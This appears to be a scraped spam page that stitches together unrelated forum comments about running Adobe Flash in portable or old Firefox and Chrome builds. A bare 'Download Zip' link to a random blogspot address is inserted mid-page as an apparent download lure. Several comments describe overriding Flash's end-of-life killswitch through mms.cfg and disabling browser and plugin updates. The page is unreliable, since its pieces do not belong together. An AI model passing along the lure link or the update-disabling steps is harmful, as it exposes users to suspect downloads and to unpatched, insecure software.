I've installed latest firefox linux-x86_64 from ftp.mozilla.com on a usb device and created a new profile file with the -P command. Unfortunately, the application does not recognize the flash plugin that is already installed on the operating system.
You can create a new profile with the -P command as shown below.I've created my profile inside USB_DEVICE/.mozilla/firefox. You can set this path later. This is Mozilla's default folder skeletton for application settings (like seamonkey, thunderbird or B2G). To create a new profile run:
firefox 22 portable flash
Download Zip: https://0doetranconcza.blogspot.com/?tj=2vFiCw
I never heard of any "portable" installation on Linux (doesn't mean that it's not possible).On Linux (Unix), applications depend a lot of what is installed on the "host" machine (called dependency), How do you manage that ?
Thank you for your Response, the Adobe Projector worked! It sucks how sketchy it has to be to get this type of software. Had to go to 'Internet Archive' because the few places I did find it just linked back to adobe where it says they ended flash.. Thank you again.
I'm running Open Suse Leap 42.3 and have installed the firefox directory in /usr/local/firefox (from the tar.gz file from firefox). I do not see however a plugins directory in firefox to install the flash plugin in (libflashplayer.so). To which directory do I have to copy this plugin.
Assuming Adobe makes flash for Linux - it will have it's own default install locations that it install to. It doesn't install into the newer version of FF as it does in the past and flash only is used if the site uses it otherwise FF doesn't by default use Flash. Otherwise you need to contact Adobe support for flash install problems.
Designed to be easy to use and install, users or website owners may install the web versionof Ruffle and existing flash content will "just work", with no extra configuration required.Ruffle will detect all existing Flash content on a website and automatically "polyfill"it into a Ruffle player, allowing seamless and transparent upgrading of websites that stillrely on Flash content.
Hi AllWe have followed the above steps and its working fine.but we have a small challlange as when ever flash required we are getting the popup as flash out of date and ask to select update plugin or run this time option.is there any option we can bypass this option.
I have many graphic image generators designed in flash and PHP that pull up on my website. I have been looking for a solution to continue using flash after the EOL for a year. I thought I had a solution and tested EXEOutput for php software compiler that allows you to run php as an executable in its own internal browser. All my tests prior to the EOL message had worked. I just needed to make sure that the users system had flashplayer ppapi installed.
Hello Stephen, I am having a real problem finding and then installing a copy of flash. I set this up and go to (URL REMOVED) to test and it fails. I tray to install an older version of flash and get an error that install failed. I try to delete the registry entry that keeps past versions of flash from installing and even under administrator it will not allow me to delete it. It seems they are closing these as fast as I find and try them. If you can help it would sure be appreciated.
So it seems if Chrome got updated to v88 then Flash was removed. Uninstalling & installing a lower version, does not re-install Flash. This is why I do not get the pop-up, because flash does not actually exist on my system.
I see that version and I have been trying to remove/downgrade it using chrome 86. But I cannot figure out how, i think the issue is the latest version of flash just has a hardcoded killswitch coded inside it.
That is correct, Flash does have a killswitch inside of it, however if the enterprise configuration exceptions are properly configured inside of the mms.cfg file, it overrides the killswitch and allows the flash applet to run.
I got this working, but its not worth the effort. I pulled a only windows 7 without SP 1 32bit off a laptop from 2013. dded the disk over, chrome is a snake, its autoupdate is nearly impossible to disable, and the flash version itself also has an auto-update, a bigger snake.
Then. install firefox 47. Install flash 22. unplug the eth. Edit mms.cfg to turn of autoupdate for flash NPAPI. Disable firefox autoupdate and rename the update folder similar to the chrome trick, otherwise it might update itself on the first run. Plug the eth cable back in, all snake updates should be disabled.
Uninstalled chrome 88 version and installed 84.0.4147. 135 (Official Build) 64 bit. Updated the mms.cfg, disabled the gupdate and gupdatem services to not get auto-update.Its shows Adobe flash player is out of date either update plugin or Run this time. If i click Run this time, it shows big Flash symbol.
Windows + Google Chrome combination:As mentioned above by others older installers are also blocking flash and not even installing it, so you need to manually install the PPAPI after Chrome has been installed on windows, you can get it from here (there are actually various versions available): EXTERNAL LINK REMOVED BY MODERATOR
Linux (Ubuntu + Chrome), I have tried a lot of different steps but none of them worked, as it seems that even if you install any flash plugins or extensions Chrome keeps trying to install and use the latest version of the plugin, which eventually blocks it to be used.
--disable-machine-id and --disable-encryption-win have been specially crafted to ensure portability. This means that passwords, cookies and other settings will not be encrypted on your hard drive. It is therefore advisable to have this data on an encrypted hard disk. For more info see portapps/brave-portable#4, portapps/brave-portable#15 and brave/brave-core#795.
sometimes I wonder why would anyone still need this dangerous propreitary software when we can use HTML5. All games seem to be ported to HTML5 now as well as video players. I would use desktop flash player if i wanted to open swf file but using flash in browser is just a big security hole
I have followed your instructions and they work! One question: how can I force an earlier version of Flash that is dropped into the portable folder (e.g., to override a later version that is installed on the computer (e.g.,
Hello, i have the last flash version installed on my PC and i have an old flash version on my portable esr in .\data\plugins.If i start like that i see all 2 versions in options/plugins and the flash used is the C:\WINDOWS\SysWOW64\Macromed\Flash\NPSWF32_32_0_0_465.dll
i install portable firefox on a different folder in drive c. that is not located in program files. I did not find the folder Data/plugins in the firefox portable folder in which i installed. Where can i find the Data/plugins folder?
A portable version of Firefox on the M disk was using Flash version 9.0.47, another portable version of Firefox on the Z disk was using Flash version 9.0.45 (the Adobe Flash tester page confirmed this). But the interesting file was on the C disk: C:\Program Files\Mozilla Firefox\plugins\NPSWF32.dllThis was probably the file Firefox was using.
Adobe bug: Its uninstaller program did not uninstall the Flash player being used by Firefox. It missed the player used by both the normally installed copy of Firefox and by two portable versions of Firefox.
A portable application can be run from a removable drive (USB flash drive, iPod, portable hard drive, etc) on any Windows computer without installation.You will carry the program with settings on removable drive and don't modify settings on host computer.On Vista and above turn off User Account Control (UAC) or run launcher as admin.
Hi,PaleMoon downloader does not install any portable launcher. I had to use one from an old version you made. Is this the expected behaviour?Thanks for your hard work anyway.The_Steph
sorry, but waterfox is really bad! this software contains some curious code which (re-)open itself- again and again and again and ...i've seen such effects some months ago. that was an officially described malware. sorry, but this prog has the same behaviour like the named one...(ok, waterfox has all the functions like firefox has. it is (sometimes) fast, it renders gfx & imgs fast, reads scripts %& styles standard compliant, .... BUT its behaviour is like a malware prog :-(
firefox downloader link not working for 17.0b1 or 16.0.1 This message: "download of Firefox Setup 17.0b1.exe (tr): 200 Switching to binary mode."or This message: "download of Firefox Setup 16.0.1.exe (tr): 200 Switching to binary mode."
Quote: "if FirefoxPortable and ThunderbirdPortable folders are in the same folder. A click on a mailto link in FirefoxPortable open a new mail in ThunderbirdPortable"- Does the opposite behavior works? For eg, if I click on a link in a mail in TB, does it open in FF portable? That would be really good.- FF Portable 17.0B1 & B2 frozes with the last Flash 11.5.500.97beta. Is it also frozing with a non portable version? If no, what happens exactly?- On Win8 & Win7 I pinned the FF & Portable icon on the taskbar. When I open it, it creates a new icon because I suppose the launcher is calling the the normal executable, so 2 different process.Is it possible to get one simple icon for both? I know this happens for all the portable apps you have so as ppapps.com, but is there a trick I can use?Thanks in advance for your help Bernat.
Thx for your reply.- Not working for me. Tried to move to different folders. Is there any option in Thunderbird, in the about:config maybe, to define FFP as main browser?- Good work, it's indeed not frozing anymore with your last launcher.- Well I pined the Firefox Portable icon on the taskbar and when I click on it, it creates a new icon of firefox just next to it... 2ff7e9595c